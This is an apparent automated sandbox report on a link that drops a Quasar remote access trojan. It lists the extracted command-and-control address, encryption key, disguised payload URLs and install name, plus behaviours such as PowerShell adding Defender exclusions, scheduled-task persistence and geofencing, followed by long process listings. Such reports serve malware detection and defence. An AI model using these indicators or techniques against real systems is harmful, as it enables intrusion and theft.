Analysis
-
max time kernel
121s -
max time network
125s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
31-12-2024 19:34
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://streannable.com/7n3qtp
Resource
win10v2004-20241007-en
General
-
Target
https://streannable.com/7n3qtp
Malware Config
Extracted
https://i.imghippo.com/files/CFqi5277Mc.jpg
Extracted
https://i.imghippo.com/files/mcm7321uo.jpg
Extracted
quasar
1.4.1
afafaf
194.26.192.167:2768
c1060262-cacc-4b5e-8e09-ac72d84cef52
-
encryption_key
BE2B0B270E4DB19CAA5C42E9D2EBF64645A2D055
-
install_name
OneDrive.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
OneDrive
-
subdirectory
OneDrive
Signatures
-
Quasar family
-
Quasar payload 2 IoCs
resource yara_rule behavioral1/files/0x0007000000023dc1-858.dat family_quasar behavioral1/memory/5644-866-0x00000000006B0000-0x00000000009D4000-memory.dmp family_quasar -
Blocklisted process makes network request 2 IoCs
flow pid Process 340 6132 powershell.exe 347 5820 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2960 powershell.exe 5288 powershell.exe 6116 powershell.exe 2260 powershell.exe 5760 powershell.exe -
A potential corporate email address has been identified in the URL: currency-file@1
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation OneDrive.exe -
Executes dropped EXE 1 IoCs
pid Process 5644 OneDrive.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Accessibility Features 1 TTPs
Windows contains accessibility features that may be used by adversaries to establish persistence and/or elevate privileges.
-
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
Modifies data under HKEY_USERS 15 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "5" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" LogonUI.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings msedge.exe Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings powershell.exe -
NTFS ADS 2 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\Unconfirmed 951261.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 921807.crdownload:SmartScreen msedge.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 4536 NOTEPAD.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5544 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 32 IoCs
pid Process 4856 msedge.exe 4856 msedge.exe 1512 msedge.exe 1512 msedge.exe 1620 identity_helper.exe 1620 identity_helper.exe 388 msedge.exe 388 msedge.exe 6116 powershell.exe 6116 powershell.exe 6116 powershell.exe 5288 powershell.exe 5288 powershell.exe 5288 powershell.exe 2260 powershell.exe 2260 powershell.exe 2260 powershell.exe 5804 powershell.exe 5804 powershell.exe 5804 powershell.exe 2960 powershell.exe 2960 powershell.exe 2960 powershell.exe 6132 powershell.exe 6132 powershell.exe 6132 powershell.exe 5760 powershell.exe 5760 powershell.exe 5760 powershell.exe 5820 powershell.exe 5820 powershell.exe 5820 powershell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 42 IoCs
pid Process 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 6116 powershell.exe Token: SeDebugPrivilege 5288 powershell.exe Token: SeDebugPrivilege 2260 powershell.exe Token: SeDebugPrivilege 5804 powershell.exe Token: SeDebugPrivilege 2960 powershell.exe Token: SeDebugPrivilege 6132 powershell.exe Token: SeDebugPrivilege 5760 powershell.exe Token: SeDebugPrivilege 5820 powershell.exe Token: SeDebugPrivilege 5644 OneDrive.exe Token: SeShutdownPrivilege 4212 shutdown.exe Token: SeRemoteShutdownPrivilege 4212 shutdown.exe Token: 33 4576 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 4576 AUDIODG.EXE -
Suspicious use of FindShellTrayWindow 43 IoCs
pid Process 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe 1512 msedge.exe -
Suspicious use of SetWindowsHookEx 16 IoCs
pid Process 5644 OneDrive.exe 4568 osk.exe 4568 osk.exe 4568 osk.exe 4568 osk.exe 4568 osk.exe 4568 osk.exe 5160 LogonUI.exe 4568 osk.exe 4568 osk.exe 4568 osk.exe 4568 osk.exe 4568 osk.exe 4568 osk.exe 4568 osk.exe 4568 osk.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1512 wrote to memory of 3184 1512 msedge.exe 82 PID 1512 wrote to memory of 3184 1512 msedge.exe 82 PID 1512 wrote to memory of 4920 1512 msedge.exe 83 PID 1512 wrote to memory of 4920 1512 msedge.exe 83 PID 1512 wrote to memory of 4920 1512 msedge.exe 83 PID 1512 wrote to memory of 4920 1512 msedge.exe 83 PID 1512 wrote to memory of 4920 1512 msedge.exe 83 PID 1512 wrote to memory of 4920 1512 msedge.exe 83 PID 1512 wrote to memory of 4920 1512 msedge.exe 83 PID 1512 wrote to memory of 4920 1512 msedge.exe 83 PID 1512 wrote to memory of 4920 1512 msedge.exe 83 PID 1512 wrote to memory of 4920 1512 msedge.exe 83 PID 1512 wrote to memory of 4920 1512 msedge.exe 83 PID 1512 wrote to memory of 4920 1512 msedge.exe 83 PID 1512 wrote to memory of 4920 1512 msedge.exe 83 PID 1512 wrote to memory of 4920 1512 msedge.exe 83 PID 1512 wrote to memory of 4920 1512 msedge.exe 83 PID 1512 wrote to memory of 4920 1512 msedge.exe 83 PID 1512 wrote to memory of 4920 1512 msedge.exe 83 PID 1512 wrote to memory of 4920 1512 msedge.exe 83 PID 1512 wrote to memory of 4920 1512 msedge.exe 83 PID 1512 wrote to memory of 4920 1512 msedge.exe 83 PID 1512 wrote to memory of 4920 1512 msedge.exe 83 PID 1512 wrote to memory of 4920 1512 msedge.exe 83 PID 1512 wrote to memory of 4920 1512 msedge.exe 83 PID 1512 wrote to memory of 4920 1512 msedge.exe 83 PID 1512 wrote to memory of 4920 1512 msedge.exe 83 PID 1512 wrote to memory of 4920 1512 msedge.exe 83 PID 1512 wrote to memory of 4920 1512 msedge.exe 83 PID 1512 wrote to memory of 4920 1512 msedge.exe 83 PID 1512 wrote to memory of 4920 1512 msedge.exe 83 PID 1512 wrote to memory of 4920 1512 msedge.exe 83 PID 1512 wrote to memory of 4920 1512 msedge.exe 83 PID 1512 wrote to memory of 4920 1512 msedge.exe 83 PID 1512 wrote to memory of 4920 1512 msedge.exe 83 PID 1512 wrote to memory of 4920 1512 msedge.exe 83 PID 1512 wrote to memory of 4920 1512 msedge.exe 83 PID 1512 wrote to memory of 4920 1512 msedge.exe 83 PID 1512 wrote to memory of 4920 1512 msedge.exe 83 PID 1512 wrote to memory of 4920 1512 msedge.exe 83 PID 1512 wrote to memory of 4920 1512 msedge.exe 83 PID 1512 wrote to memory of 4920 1512 msedge.exe 83 PID 1512 wrote to memory of 4856 1512 msedge.exe 84 PID 1512 wrote to memory of 4856 1512 msedge.exe 84 PID 1512 wrote to memory of 3020 1512 msedge.exe 85 PID 1512 wrote to memory of 3020 1512 msedge.exe 85 PID 1512 wrote to memory of 3020 1512 msedge.exe 85 PID 1512 wrote to memory of 3020 1512 msedge.exe 85 PID 1512 wrote to memory of 3020 1512 msedge.exe 85 PID 1512 wrote to memory of 3020 1512 msedge.exe 85 PID 1512 wrote to memory of 3020 1512 msedge.exe 85 PID 1512 wrote to memory of 3020 1512 msedge.exe 85 PID 1512 wrote to memory of 3020 1512 msedge.exe 85 PID 1512 wrote to memory of 3020 1512 msedge.exe 85 PID 1512 wrote to memory of 3020 1512 msedge.exe 85 PID 1512 wrote to memory of 3020 1512 msedge.exe 85 PID 1512 wrote to memory of 3020 1512 msedge.exe 85 PID 1512 wrote to memory of 3020 1512 msedge.exe 85 PID 1512 wrote to memory of 3020 1512 msedge.exe 85 PID 1512 wrote to memory of 3020 1512 msedge.exe 85 PID 1512 wrote to memory of 3020 1512 msedge.exe 85 PID 1512 wrote to memory of 3020 1512 msedge.exe 85 PID 1512 wrote to memory of 3020 1512 msedge.exe 85 PID 1512 wrote to memory of 3020 1512 msedge.exe 85 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://streannable.com/7n3qtp1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1512 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcd55e46f8,0x7ffcd55e4708,0x7ffcd55e47182⤵PID:3184
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,6998174174782523541,2645770596384963972,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2088 /prefetch:22⤵PID:4920
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2064,6998174174782523541,2645770596384963972,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:4856
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2064,6998174174782523541,2645770596384963972,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2896 /prefetch:82⤵PID:3020
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,6998174174782523541,2645770596384963972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:12⤵PID:4508
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,6998174174782523541,2645770596384963972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:12⤵PID:3100
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,6998174174782523541,2645770596384963972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4672 /prefetch:12⤵PID:2484
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2064,6998174174782523541,2645770596384963972,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5380 /prefetch:82⤵PID:4564
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2064,6998174174782523541,2645770596384963972,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5380 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1620
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,6998174174782523541,2645770596384963972,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5520 /prefetch:12⤵PID:1216
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,6998174174782523541,2645770596384963972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6012 /prefetch:12⤵PID:4708
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,6998174174782523541,2645770596384963972,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4916 /prefetch:12⤵PID:2928
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,6998174174782523541,2645770596384963972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5560 /prefetch:12⤵PID:3640
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,6998174174782523541,2645770596384963972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4772 /prefetch:12⤵PID:2444
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,6998174174782523541,2645770596384963972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6012 /prefetch:12⤵PID:548
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,6998174174782523541,2645770596384963972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6000 /prefetch:12⤵PID:2000
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,6998174174782523541,2645770596384963972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6220 /prefetch:12⤵PID:3092
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,6998174174782523541,2645770596384963972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6180 /prefetch:12⤵PID:5012
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2064,6998174174782523541,2645770596384963972,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5556 /prefetch:82⤵PID:792
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,6998174174782523541,2645770596384963972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4764 /prefetch:12⤵PID:2228
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2064,6998174174782523541,2645770596384963972,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4796 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:388
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,6998174174782523541,2645770596384963972,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6016 /prefetch:12⤵PID:4460
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,6998174174782523541,2645770596384963972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6080 /prefetch:12⤵PID:1852
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,6998174174782523541,2645770596384963972,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1740 /prefetch:12⤵PID:3640
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,6998174174782523541,2645770596384963972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1180 /prefetch:12⤵PID:3084
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,6998174174782523541,2645770596384963972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6716 /prefetch:12⤵PID:3744
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,6998174174782523541,2645770596384963972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4184 /prefetch:12⤵PID:2560
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,6998174174782523541,2645770596384963972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6656 /prefetch:12⤵PID:2912
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,6998174174782523541,2645770596384963972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6264 /prefetch:12⤵PID:3084
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,6998174174782523541,2645770596384963972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6004 /prefetch:12⤵PID:2888
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,6998174174782523541,2645770596384963972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5632 /prefetch:12⤵PID:3240
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,6998174174782523541,2645770596384963972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6384 /prefetch:12⤵PID:4492
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,6998174174782523541,2645770596384963972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6060 /prefetch:12⤵PID:516
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,6998174174782523541,2645770596384963972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6872 /prefetch:12⤵PID:3116
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,6998174174782523541,2645770596384963972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6464 /prefetch:12⤵PID:2172
-
-
